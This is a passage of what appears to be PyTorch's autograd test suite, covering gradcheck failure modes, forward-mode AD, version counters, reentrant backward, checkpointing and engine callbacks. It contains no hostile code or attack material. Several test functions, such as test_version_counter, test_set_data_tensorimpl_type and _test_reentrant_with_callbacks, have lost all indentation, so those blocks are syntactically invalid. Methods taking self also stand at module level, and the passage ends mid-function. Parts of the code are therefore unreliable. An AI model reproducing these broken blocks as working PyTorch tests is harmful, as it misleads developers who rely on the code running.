        with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
            gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))

        # when backward not multiplied by grad_output (sparse case)
        def fn3(x):
            y = x.clone().to_dense()
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
            gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                   raise_exception=False, fast_mode=fast_mode))

        # when layout of grad_input is not the same as input
        class Test(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, x):
                return x.to_sparse()
        x = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
            gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
    """A backward that errors on undefined grads is reported by gradcheck."""
    def check(fast_mode):
        # when encounter runtime error while running backward
        def fn(x):
            def hook(grad):
                if grad is None:
                    raise RuntimeError("x is undefined")
            out = x.clone()
            out.register_hook(hook)
            return out
        inp = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
            with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
                gradcheck(fn, (inp,), fast_mode=fast_mode)
            self.assertFalse(gradcheck(fn, (inp,), raise_exception=False, fast_mode=fast_mode))

    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
    """Hooked functions that perturb grads trigger Jacobian-mismatch errors.

    Covers R->R / C->C, R->C, and C->R functions; complex cases check the
    imaginary-part error message. Some calls pin fast_mode=False because
    the complex messages are produced by the slow path.
    """
    def check(fast_mode):
        def fn(x):  # R -> R, C -> C
            y = x.clone()
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn, (x,), fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))

        x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
        with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
            gradcheck(fn, (x_c,), fast_mode=False)
        self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))

        def fn2(x):  # R -> C
            y = torch.complex(x, x)
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
            gradcheck(fn2, (x,), fast_mode=False)
        self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))

        def fn3(x):  # C -> R
            y = torch.real(x)
            y.register_hook(lambda x: x + 1e-2)
            return y
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn3, (x_c,), fast_mode=False)
        self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))

    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
    """gradcheck accepts a mix of dense and sparse COO inputs when
    check_sparse_nnz=True (batched grad is unsupported for sparse,
    hence check_batched_grad=False), in both fast and slow mode."""
    def mul_dense_by_sparse(x, y):
        return x * y.coalesce().to_dense()

    for fast in (True, False):
        dense_inp = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
        sparse_inp = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
        self.assertTrue(gradcheck(mul_dense_by_sparse, (dense_inp, sparse_inp),
                                  check_sparse_nnz=True, check_batched_grad=False,
                                  fast_mode=fast))
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
    """gradcheck with MKL-DNN (opaque layout) inputs: one dense + one mkldnn
    input, then two mkldnn inputs, in both fast and slow mode.

    Batched grad is unsupported for mkldnn tensors (check_batched_grad=False)
    and atol is loosened to 1e-1 because mkldnn only supports float32.
    """
    def check(fast_mode):
        def fn(x, y):
            return x + y.to_dense()
        a = torch.rand(10, requires_grad=True)
        b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
        self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))

        def fn2(x, y):
            return x.to_dense() + y.to_dense()
        c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
        # Bug fix: the original called `fn` with `(a, c)` here (dense + mkldnn),
        # leaving `fn2` dead and never testing the multiple-mkldnn-inputs case
        # this test is named for. Exercise fn2 with two mkldnn tensors.
        self.assertTrue(gradcheck(fn2, (b, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
    """gradcheck must detect functions whose output shape or dtype changes
    when the input is perturbed by finite differencing (here: input exactly
    at the 1.0 boundary flips the branch under an eps perturbation)."""
    def check(fast_mode):
        def fn(x):
            if torch.all(x >= 1):
                return torch.cat([x, x])
            else:
                return x
        a = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
            self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))

        def fn2(x):
            if torch.all(x >= 1):
                return x.to(torch.float32)
            else:
                return x
        with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
            self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
    """The deprecated public get_numerical_jacobian still works (with a
    deprecation warning) and rejects grad_out values other than 1.0."""
    # get_numerical_jacobian is deprecated and no longer used internally by gradcheck
    from torch.autograd.gradcheck import get_numerical_jacobian

    def fn(inputs):
        # get_numerical_jacobian requires fn to take inputs as a tuple
        # and returns the jacobian wrt the first output
        x = inputs[0]
        y = inputs[1]
        return 2 * x + y, x + 2 * y
    a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
    b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)

    # target=a: jacobian of output 0 wrt `a` only -> d(2x+y)/dx = 2*I
    with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
        jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
    self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))

    # no target: jacobians of output 0 wrt all inputs -> (2*I, 1*I)
    with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
        jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
    self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
    self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))

    with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
        jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
    """The deprecated public get_analytical_jacobian still works (with a
    deprecation warning), reports non-reentrant backwards, and rejects
    grad_out values other than 1.0."""
    from torch.autograd.gradcheck import get_analytical_jacobian

    def fn(x, y):
        return 2 * x + y, x + 2 * y

    a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
    b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)

    outputs = fn(a, b)
    with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
        jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
    self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
    self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
    self.assertTrue(reentrant)

    # A backward that injects random jitter is non-deterministic, so running
    # it twice gives different jacobians -> reentrant must be reported False.
    class NonDetFunc(Function):
        @staticmethod
        def forward(ctx, x, jitter=0.0):
            ctx._jitter = jitter
            return x

        @staticmethod
        def backward(ctx, grad_out):
            return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None

    outputs = NonDetFunc.apply(a, 1e-6)
    with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
        jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
    self.assertFalse(reentrant)

    with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
        jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
    """gradcheck failures raise GradcheckError, which is also catchable as
    RuntimeError (backward compatibility); with raise_exception=False only
    GradcheckErrors are swallowed, other exceptions propagate."""
    from torch.autograd.gradcheck import GradcheckError

    def check(fast_mode):
        def fn(x):
            y = x.clone()
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn, (x,), fast_mode=fast_mode)
        # Same failure must also be catchable as RuntimeError (GradcheckError
        # is raised where a RuntimeError used to be).
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn, (x,), fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))

        def fn2(x):
            raise RuntimeError("Not a GradcheckError!")
        # Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
        with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
            gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)

    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_forward_ad(self):
    """check_forward_ad=True compares forward-mode AD against numerical
    jacobians, for real/real, complex/mixed and complex/complex cases.
    bad_fn scales the tangent only when running under a forward-AD level,
    so only the forward-mode path sees a mismatch."""
    def fn(x, y):
        return x + y, y

    def bad_fn(x, y):
        # Hacky way to check if we're currently inside a forward ad level
        is_running_forward_ad = fwAD._current_level >= 0

        if is_running_forward_ad:
            y_p, y_d = fwAD.unpack_dual(y)
            y = fwAD.make_dual(y_p, y_d * 1.1)

        return x + y, y

    err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"

    for fast_mode in [True, False]:
        # Test for all inputs and outputs being real
        x = torch.rand(2, dtype=torch.double, requires_grad=True)
        y = torch.rand(2, dtype=torch.double, requires_grad=True)

        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)

        def basic_mul(x):
            return torch.view_as_real(torch.resolve_conj(x * 1j))
        # gradcheck accepts a bare tensor in place of a 1-tuple of inputs
        gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)

        # Test for one input and one output being complex
        x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)

        # Test for all inputs and outputs being complex
        y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_gradcheck_check_forward_or_backward_only(self):
    """Depending on settings for check_forward_ad and check_backward_ad, the
    correct codepaths should be reached (or not reached)
    """
    fwd_fail_err_msg = "FAIL FWD"
    bwd_fail_err_msg = "FAIL BWD"

    # UserFn fails in jvp iff fwd_bad, and in vjp iff bwd_bad; gradcheck
    # should only trip over whichever failure mode it was asked to check.
    class UserFn(Function):
        @staticmethod
        def forward(ctx, foo, fwd_bad, bwd_bad):
            ctx.fwd_bad = fwd_bad
            ctx.bwd_bad = bwd_bad
            return foo * 2

        @staticmethod
        def vjp(ctx, gO):
            if ctx.bwd_bad:
                raise RuntimeError(bwd_fail_err_msg)
            else:
                return 2 * gO, None, None

        @staticmethod
        def jvp(ctx, gI, _1, _2):
            if ctx.fwd_bad:
                raise RuntimeError(fwd_fail_err_msg)
            else:
                return 2 * gI

    # Exhaustive sweep over every combination of mode flags and failure modes.
    for fast_mode in (True, False):
        for check_forward_ad in (True, False):
            for check_backward_ad in (True, False):
                for fwd_bad in (True, False):
                    for bwd_bad in (True, False):
                        fwd_should_fail = fwd_bad and check_forward_ad
                        bwd_should_fail = bwd_bad and check_backward_ad

                        def run():
                            gradcheck(UserFn.apply, (x, fwd_bad, bwd_bad), check_forward_ad=check_forward_ad,
                                      check_backward_ad=check_backward_ad, check_undefined_grad=check_backward_ad,
                                      check_batched_grad=check_backward_ad, fast_mode=fast_mode)

                        x = torch.rand(2, dtype=torch.double, requires_grad=True)

                        # Checking neither mode is a configuration error.
                        if not check_forward_ad and not check_backward_ad:
                            with self.assertRaisesRegex(AssertionError, "Expected at least one of"):
                                run()
                            continue

                        if not fwd_should_fail and not bwd_should_fail:
                            run()
                        else:
                            # If both fail, backward AD failure "hides" forward AD failure
                            if fwd_should_fail:
                                fail_msg = fwd_fail_err_msg
                            if bwd_should_fail:
                                fail_msg = bwd_fail_err_msg
                            with self.assertRaisesRegex(RuntimeError, fail_msg):
                                run()
def test_gradcheck_forward_ad_batched_grad(self):
    """check_batched_forward_grad=True: works with non-tensor inputs and with
    inputs whose tangent is None, and surfaces vmap's ban on random ops run
    inside a custom Function's jvp."""
    x = torch.rand(2, dtype=torch.double, requires_grad=True)

    # multiple inputs and outputs with non-tensors inputs
    def fn1(a: torch.Tensor, b: int):
        return a.clone(), a + 1
    gradcheck(fn1, (x, 1), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
              check_undefined_grad=False, check_batched_forward_grad=True)

    # unrelated inputs: tangent for c is None
    def fn2(a: torch.Tensor, c: torch.Tensor):
        return a.clone()
    gradcheck(fn2, (x, x.clone()), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
              check_undefined_grad=False, check_batched_forward_grad=True)

    class Fn(Function):
        @staticmethod
        def forward(ctx, foo):
            return foo * 2

        @staticmethod
        def vjp(ctx, gO):
            return gO * 2

        @staticmethod
        def jvp(ctx, gI):
            # Random op inside jvp: forbidden under vmap, which the batched
            # forward-grad check runs this through.
            torch.randn_like(gI)
            return gI * 2

    msg = "vmap: We do not yet support calling random operations inside of vmap"
    with self.assertRaisesRegex(RuntimeError, msg):
        gradcheck(Fn.apply, (x,), check_forward_ad=True, check_batched_forward_grad=True)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
    """Run a small autograd program in a subprocess and assert that the
    autograd engine's worker-thread shutdown path is exercised at interpreter
    exit (detected via the PYTORCH_API_USAGE stderr logging)."""
    # NOTE: `code` is runtime data executed in a child process; its contents
    # (including the zero-dim () shape case) must not be altered.
    code = """import torch
from torch.autograd import Function
class MyFunction(Function):
    @staticmethod
    def forward(ctx, x):
        return x

    @staticmethod
    def backward(ctx, grad):
        return grad

for shape in [(1,), ()]:
    v = torch.ones(shape, requires_grad=True)
    MyFunction.apply(v).backward()
"""
    s = TestCase.runWithPytorchAPIUsageStderr(code)
    self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
    """A backward that recursively re-enters backward() 2000 levels deep must
    not overflow the stack — the engine offloads deep reentrant calls to
    other threads instead of recursing in-thread."""
    class DeepReentrant(Function):
        @staticmethod
        def forward(ctx, x):
            # Recreate a leaf from x so each apply() builds a fresh graph.
            with torch.enable_grad():
                ctx.x = Variable(x.detach(), requires_grad=True)
                ctx.x = ctx.x - 1
            return ctx.x.detach()

        @staticmethod
        def backward(ctx, x):
            if ctx.x < 0:
                return x
            # Recurse: one extra reentrant backward per unit of the input.
            with torch.enable_grad():
                DeepReentrant.apply(ctx.x).sum().backward()
            return x

    # Test stack overflow escape mechanism
    v = torch.tensor(2000.0, requires_grad=True)
    # This will cause stack overflow if reentrant calls are handled
    # in the same thread recursively
    DeepReentrant.apply(v).sum().backward()

    # Test stack overflow escape mechanism multiple times
    # to ensure reusing workers in the pool works fine
    v2 = torch.tensor(200.0, requires_grad=True)
    DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
    """Reentrant backward tasks must be prioritized over ordinary tasks that
    were queued at the same time: all 10 nested Reentrant backwards run
    before MyFunction's backward."""
    order = []

    class MyFunction(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, x):
            order.append("MyFunction")
            return x

    class Reentrant(Function):
        @staticmethod
        def forward(ctx, x):
            with torch.enable_grad():
                ctx.x = Variable(x.detach(), requires_grad=True)
                ctx.x = ctx.x - 1
            return ctx.x.detach()

        @staticmethod
        def backward(ctx, x):
            order.append("Reentrant")
            if ctx.x < 0:
                return x
            with torch.enable_grad():
                Reentrant.apply(ctx.x).backward()
            return x

    # `v = a * b` makes both functions' backwards ready simultaneously.
    a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
    b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
    v = a * b
    v.backward()
    # The tasks for the Reentrant and MyFunction backward() will be added
    # to the queue in the autograd engine at the same time. The backward
    # for Reentrant will be executed first, which will then add other
    # backward tasks to the queue. We want to ensure all the reentrant tasks
    # are prioritized over the MyFunction backward task regardless of their
    # sequence numbers
    self.assertEqual(len(order), 11)
    self.assertEqual(order.count("Reentrant"), 10)
    self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
    """Stress-test checkpoint() over many independent inputs feeding one
    joint loss: backward through the stacked mean re-runs every checkpointed
    forward. (Removed the dead local `nz_out`, which was never read.)"""
    num_inp = 2000
    nz_inp = 10
    nz_bottleneck = 1000

    # small proxy network for some complex reasoning we want to do per input
    module = nn.Sequential(
        nn.Linear(nz_inp, nz_bottleneck),
        nn.ReLU(),
        nn.Linear(nz_bottleneck, nz_inp)
    )

    feat_combined = []
    for r in range(num_inp):
        data_r = torch.empty(1, nz_inp)
        data_r.uniform_()
        data_r.requires_grad = True
        feat_r = checkpoint(module, data_r)
        feat_combined.append(feat_r)

    # compute mean as a proxy for some joint reasoning
    mean_combined = torch.stack(feat_combined).mean()
    mean_combined.backward()
@slowTest
@parametrize("input_requires_grad", [True, False])
def test_checkpointing_without_reentrant(self, input_requires_grad):
    """
    Basic test for checkpoint without reentrant autograd: run the same
    module with and without checkpointing (on a deep copy) and verify the
    parameter gradients match, whether or not the inputs require grad.
    (Removed the dead local `nz_out`, which was never read.)
    """
    num_inp = 2000
    nz_inp = 10
    nz_bottleneck = 1000

    # small proxy network for some complex reasoning we want to do per input
    module = nn.Sequential(
        nn.Linear(nz_inp, nz_bottleneck),
        nn.ReLU(),
        nn.Linear(nz_bottleneck, nz_inp)
    )

    # Run model with and without checkpointing and verify gradients are
    # equivalent, regardless of if inputs require grads or not.
    module_copy = deepcopy(module)

    feat_combined = []
    feat_combined_no_checkpoint = []
    for r in range(num_inp):
        data_r = torch.empty(1, nz_inp)
        data_r.uniform_()
        data_r.requires_grad = input_requires_grad
        data_r_copy = data_r.clone()
        feat_r = checkpoint(module, data_r, use_reentrant=False)
        feat_combined.append(feat_r)
        feat_r_no_checkpoint = module_copy(data_r)
        feat_combined_no_checkpoint.append(feat_r_no_checkpoint)

    # compute mean as a proxy for some joint reasoning
    mean_combined = torch.stack(feat_combined).mean()
    mean_combined.backward()
    mean_combined_no_checkpoint = torch.stack(feat_combined_no_checkpoint).mean()
    mean_combined_no_checkpoint.backward()

    for checkpoint_param, param in zip(module.parameters(), module_copy.parameters()):
        self.assertEqual(checkpoint_param.grad, param.grad)
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
@parametrize("use_reentrant", [True, False])
def test_checkpointing_without_reentrant_detached_tensor(self, use_reentrant):
    """Checkpoint a module whose forward runs entirely under no_grad, so its
    output does not require grad: reentrant checkpoint must error out,
    non-reentrant checkpoint must work."""
    class NoGradModule(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.linear = nn.Linear(2, 2, bias=False)
            self.lin2 = nn.Linear(2, 2, bias=False)

        def forward(self, x):
            with torch.no_grad():
                return self.lin2(self.linear(x))

    module = NoGradModule()

    # Only the reentrant variant raises; otherwise use a no-op context.
    err_ctx = (
        self.assertRaisesRegex(
            RuntimeError,
            "none of output has requires_grad=True"
        )
        if use_reentrant
        else contextlib.suppress()
    )

    a = torch.randn(2, 2, requires_grad=True)
    for _ in range(3):
        with err_ctx:
            # out does not require grad
            out = checkpoint(module, a, use_reentrant=use_reentrant)
            # Make loss require grad, otherwise we would run into
            # "element 0 of tensors does not require grad and does not have a grad_fn"
            out += a
            out.sum().backward()
def test_checkpointing_without_reentrant_correct_grad(self):
    """
    Verifies that correct gradients are calculated for checkpoint
    without reentrant autograd, for both backward() and autograd.grad().
    """
    a = torch.randn(2, 2, requires_grad=True)

    # Reference gradient: no checkpointing.
    b = torch.exp(a).sum()
    b.backward()
    b_grad = a.grad

    # Same computation under non-reentrant checkpoint, via .backward().
    a.grad = None
    c = checkpoint(torch.exp, a, use_reentrant=False).sum()
    c.backward()
    c_grad = a.grad

    # And via torch.autograd.grad().
    a.grad = None
    d = checkpoint(torch.exp, a, use_reentrant=False).sum()
    d_grad, = torch.autograd.grad(d, (a,))

    self.assertEqual(b_grad, c_grad)
    self.assertEqual(b_grad, d_grad)
def test_checkpointing_without_reentrant_dataparallel(self):
    """
    Verifies gradient correctness when checkpoint without reentrant autograd
    is used in conjunction with DataParallel.
    """
    class LinearModule(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.linear = nn.Linear(2, 2, bias=False)

        def forward(self, inp):
            return self.linear(inp)

    a = torch.randn(2, 2, requires_grad=True)
    # Moves to GPU when available so DataParallel actually parallelizes;
    # the test still runs (single device) on CPU-only builds.
    if torch.cuda.is_available():
        a = a.cuda()

    model = LinearModule()
    if torch.cuda.is_available():
        model = model.cuda()

    # Reference gradient from a plain (deep-copied) forward/backward.
    b = deepcopy(model)(a).sum()
    b.backward()
    b_grad = a.grad

    a.grad = None

    # Same computation through DataParallel + non-reentrant checkpoint.
    module = torch.nn.DataParallel(deepcopy(model))
    c = checkpoint(module, a, use_reentrant=False).sum()
    c.backward()
    c_grad = a.grad

    self.assertEqual(b_grad, c_grad)
def test_checkpointing_without_reentrant_parameter_used_in_an_out(self):
    """
    Ensures that gradient hooks are only called once per tensor.
    """
    # `w` participates both outside and inside the checkpointed region; its
    # grad hook must still fire exactly once for the whole backward.
    w = torch.randn(10, 10, requires_grad=True)
    count = 0

    def hook(grad):
        nonlocal count
        count += 1

    w.register_hook(hook)
    x = torch.rand(10, 10, requires_grad=True)
    h = w * x  # Using w outside the checkpoint
    out = checkpoint(lambda x: w * x, h, use_reentrant=False)  # Using w inside the checkpoint

    out.sum().backward()
    # should only call hook once
    self.assertEqual(count, 1)
def test_checkpointing_without_reentrant_arbitrary_input_output(self):
    """
    Ensures checkpointing without reentrant autograd works with functions
    with arbitrary input/output structures.
    """
    # Module taking and returning dicts rather than plain tensors.
    class MyModel(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.layer = torch.nn.Linear(5, 5, bias=False)

        def forward(self, dict_input):
            tensor = dict_input["tensor"]
            return {
                "result": self.layer(tensor)
            }

    model_no_checkpoint = MyModel()
    model_checkpoint_without_reentrant = deepcopy(model_no_checkpoint)

    inp = {
        "tensor": torch.randn(5, 5)
    }

    out_no_checkpoint = model_no_checkpoint(inp)["result"].sum()

    out_checkpoint = checkpoint(
        model_checkpoint_without_reentrant,
        inp,
        use_reentrant=False
    )["result"].sum()

    self.assertEqual(out_checkpoint, out_no_checkpoint)

    out_no_checkpoint.backward()
    out_checkpoint.backward()

    # Both runs must produce identical parameter gradients.
    for param, checkpoint_param in zip(model_no_checkpoint.parameters(), model_checkpoint_without_reentrant.parameters()):
        self.assertEqual(param.grad, checkpoint_param.grad)
def test_callback_adds_callback(self):
    """A final callback queued from inside another final callback (itself
    queued during backward) must also be executed — both callbacks run."""
    called = [0]

    def callback_final():
        called[0] += 1

    def callback_adds_callback():
        called[0] += 1
        # Queue a second callback from within the first one.
        Variable._execution_engine.queue_callback(callback_final)

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        @once_differentiable
        def backward(ctx, grad):
            Variable._execution_engine.queue_callback(callback_adds_callback)
            return grad

    a = torch.rand((3, 3), requires_grad=True)
    b = MyFunc.apply(a)
    b.sum().backward()

    self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
    """A callback installed only at the outer (reentrant) depth fires once;
    the inner counter stays untouched."""
    counters = self._test_reentrant_with_callbacks([0])
    self.assertEqual(1, counters["outer"])
    self.assertEqual(0, counters["inner"])
def test_reentrant_with_callbacks_depth_1(self):
    """A callback installed only at the inner (nested) depth fires once;
    the outer counter stays untouched."""
    counters = self._test_reentrant_with_callbacks([1])
    self.assertEqual(0, counters["outer"])
    self.assertEqual(1, counters["inner"])
def test_reentrant_with_callbacks_both_depths(self):
    """Callbacks installed at both depths each fire exactly once."""
    counters = self._test_reentrant_with_callbacks([0, 1])
    self.assertEqual(1, counters["outer"])
    self.assertEqual(1, counters["inner"])
def test_reentrant_with_leaf_variable_hook(self):
    """A hook on a leaf tensor may itself run a reentrant backward (here a
    gradient-penalty style computation) without deadlocking or corrupting
    param.grad."""
    handle = None
    param = torch.rand(10, requires_grad=True)

    def add_gradient_penalty_to_grad(grad):
        # Remove immediately so the reentrant backward below does not
        # re-trigger this hook.
        handle.remove()
        old_param_grad = grad
        param.grad = None
        # Add some sort of gradient penalty by directly updating the gradients
        with torch.enable_grad():
            g = grad.detach().requires_grad_()
            new_param = param.detach().requires_grad_()
            out = ((g * 2) + new_param).sum()
            out.backward()
        res = g.grad + grad
        param.grad = old_param_grad
        return res

